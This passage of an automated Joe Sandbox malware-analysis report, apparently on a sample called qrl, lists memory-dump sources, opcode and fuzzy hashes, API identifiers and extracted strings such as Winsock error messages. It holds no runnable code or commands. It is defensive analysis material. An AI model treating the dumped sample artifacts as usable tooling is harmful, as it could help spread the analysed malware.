                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-3978297105
                                                                                                                                                                                                                                                            • Opcode ID: 437f1716e950133982f47c6665ccf7b9363b70620054ba8e0514c590fc5a3781
                                                                                                                                                                                                                                                            • Instruction ID: 0e90f89776cf3fad3ce4a0af62a60934cd4df6810e8dd921e8926cba09fcf4c8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 437f1716e950133982f47c6665ccf7b9363b70620054ba8e0514c590fc5a3781
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE61C1716347019FE728DE24D881B2FB3E5BF41704F14482DE99A87392EB71EC649B62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Internal error clearing splay node = %d, xrefs: 00248AD1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-3978297105
                                                                                                                                                                                                                                                            • Opcode ID: 35f6b08f9269b72c7e3b572cd70b17ce1930b45451344a6c009666dc9ac21f22
                                                                                                                                                                                                                                                            • Instruction ID: 9afdaf6f3909f8e8be7bb564b0b8adb8b771d23ccb807057e188419096d39a84
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35f6b08f9269b72c7e3b572cd70b17ce1930b45451344a6c009666dc9ac21f22
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E51E2716247019FE328EF14D841B6FB3E5BF41314F044829F99A87392EB71ED648BA2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Shuffling %i addresses
                                                                                                                                                                                                                                                            • API String ID: 0-3589116693
                                                                                                                                                                                                                                                            • Opcode ID: 9a3ee68281dd2fd4400860eca6b3fce81181bea4fcc76c346919160ecb4a37a1
                                                                                                                                                                                                                                                            • Instruction ID: f4944272192291a0f6774518fc3162cafd8b86bdff95af7c88ceff6e6ea44ba3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a3ee68281dd2fd4400860eca6b3fce81181bea4fcc76c346919160ecb4a37a1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8831CE75A142118BD320DF29C94492BB7F6EF89309F0A4528EC8AD7311E731ED25CB8A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • WARNING: Using weak random seed, xrefs: 002853CB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: WARNING: Using weak random seed
                                                                                                                                                                                                                                                            • API String ID: 0-2797872110
                                                                                                                                                                                                                                                            • Opcode ID: 82b28d9d7e9bfa785efa5f29dfc8f8f210d98374aff5c460053de12567d84a07
                                                                                                                                                                                                                                                            • Instruction ID: 22c70f0455e59d29a33e30cbaced2470db863c17ed513ad6acb9963e6ff9cd20
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82b28d9d7e9bfa785efa5f29dfc8f8f210d98374aff5c460053de12567d84a07
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F216B7AA257018FD700AF149C8063AB7ECEBE1305F14493CE989E7690D770DC598B9A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: f9510e5371856a57da19edf6cab7953d95cf420efcc6c5383e748b0cf7e06187
                                                                                                                                                                                                                                                            • Instruction ID: 4909f3b9d6d275b6b392e60decf9aba1f43a0847d9ca8e08afedc93fd20f2877
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9510e5371856a57da19edf6cab7953d95cf420efcc6c5383e748b0cf7e06187
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B951F571925345ABDB909F249E81B2BBAE8AF45308F084578FC8CD7242E735DC34CB66
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b7d46b46efc12d4d0c0833a4ace5fb21d0ebd15de377b4c52f57367c8946c7ba
                                                                                                                                                                                                                                                            • Instruction ID: df14997a4ef2801d88afbf20c62840d38c600d3512b5dad37015c1d3f1e650cb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7d46b46efc12d4d0c0833a4ace5fb21d0ebd15de377b4c52f57367c8946c7ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 133153E6D1170467DA207EA16CC6F6B726C9F57709F04083CF95A52203EE65A9388AF3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: ed858f307ea5ed0c0367b88f5fbb885cce8ea97d1f42fa0a461c6cb66f00cf18
                                                                                                                                                                                                                                                            • Instruction ID: d96fc188a09a53e252e1594533ac7c630045fc926dfab8576cdacd77685d7fe0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed858f307ea5ed0c0367b88f5fbb885cce8ea97d1f42fa0a461c6cb66f00cf18
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D419D706287029FCF14DF18C9C0AABB7A4FB91315F16896CE44A97261D330AD29CB92
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CountTick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 536389180-0
                                                                                                                                                                                                                                                            • Opcode ID: ae435c540959eddb72ecfd697161aaabb4a8d1fbf00b198255eca3aab58b2ab7
                                                                                                                                                                                                                                                            • Instruction ID: 7436069f11c63d3675ed6381cc0da0529434149eb3911ae5a651581176dcaa66
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae435c540959eddb72ecfd697161aaabb4a8d1fbf00b198255eca3aab58b2ab7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D416A72A08306AFDB149F64C840B6BBBE5FF84314F058968ED686B312D371AC64CF91
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: facf62b0738197f8f2bad35efd3e709c04c41603ade51e048969b0a60cb51b2d
                                                                                                                                                                                                                                                            • Instruction ID: b070f28b4b3aaddf1cee6e27527adf903dfe1000e2e1684b706aeaf770dae432
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: facf62b0738197f8f2bad35efd3e709c04c41603ade51e048969b0a60cb51b2d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3F06D329196169FDB12CE84C880927F7A8FF49718B09452EEE5867201D332F934DBA1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 824db2ead7eb239b2d7a7d559e9403c3bece3065767f32f3ee191fa6d9c14e08
                                                                                                                                                                                                                                                            • Instruction ID: c6965776b97d5d9d57ca4b7409ee4601a9c8657e68375c0b5b01beedf9eba904
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 824db2ead7eb239b2d7a7d559e9403c3bece3065767f32f3ee191fa6d9c14e08
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23D0122450DAE24BD6054F318160933FFF16A9B745F8895CDE0C56B6A2C525C810DBAA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 59162168693bff71874ab2cbc88fcb23bd6e88951ecf10041ad922ca9b325d38
                                                                                                                                                                                                                                                            • Instruction ID: 968bd245f39c1a8cb1c215f18763955ac155616e0ca8630b0f5a3b8eaacda748
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59162168693bff71874ab2cbc88fcb23bd6e88951ecf10041ad922ca9b325d38
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FD0C9357121028BDF08CE28C0A093AB3B0AF87714B74A49C9806EB201CA22EC02CA04
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast_errno$strncpystrrchr$strerror
                                                                                                                                                                                                                                                            • String ID: %s (0x%08X)$%s - %s$Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$SEC_E_CANNOT_INSTALL$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_NOT_OWNER$SEC_E_SECPKG_NOT_FOUND$SEC_E_TARGET_UNKNOWN$SEC_E_UNSUPPORTED_FUNCTION$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unknown error$Unknown error %d (%#x)$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                                                                                                                                                            • API String ID: 3913568843-2339563239
                                                                                                                                                                                                                                                            • Opcode ID: f3cbc6af34e1b4977c1410cd32b9a86bec5b24fc7116a870ce0dfa5fccdf2a54
                                                                                                                                                                                                                                                            • Instruction ID: 4933e2a77fc967f7b2c5891c6b436cac77461a13de1a2588772f1a5f67ad0134
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3cbc6af34e1b4977c1410cd32b9a86bec5b24fc7116a870ce0dfa5fccdf2a54
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42A1AB30BB8201DBDB286A188C6572B3655DB51301F15807BBC4EDB385F7E89E24E76B
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$freemallocstrncpy$strncmpstrpbrk
                                                                                                                                                                                                                                                            • String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN$\/:$\\?\
                                                                                                                                                                                                                                                            • API String ID: 2260474773-1589196987
                                                                                                                                                                                                                                                            • Opcode ID: 55fda9e9f29ed430fe0c172d2eea47afa1e56e4f341af52243f1a1b0be8fecb3
                                                                                                                                                                                                                                                            • Instruction ID: 3ffbad80588d1f9bd17ccbb127a43a30ddcacca57594c3bd3e53afa455cc43ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55fda9e9f29ed430fe0c172d2eea47afa1e56e4f341af52243f1a1b0be8fecb3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81D14BF1A243426BEB35DD259C42BAB72C94F55304F08007DED8987382F66DDF718656
                                                                                                                                                                                                                                                            APIs
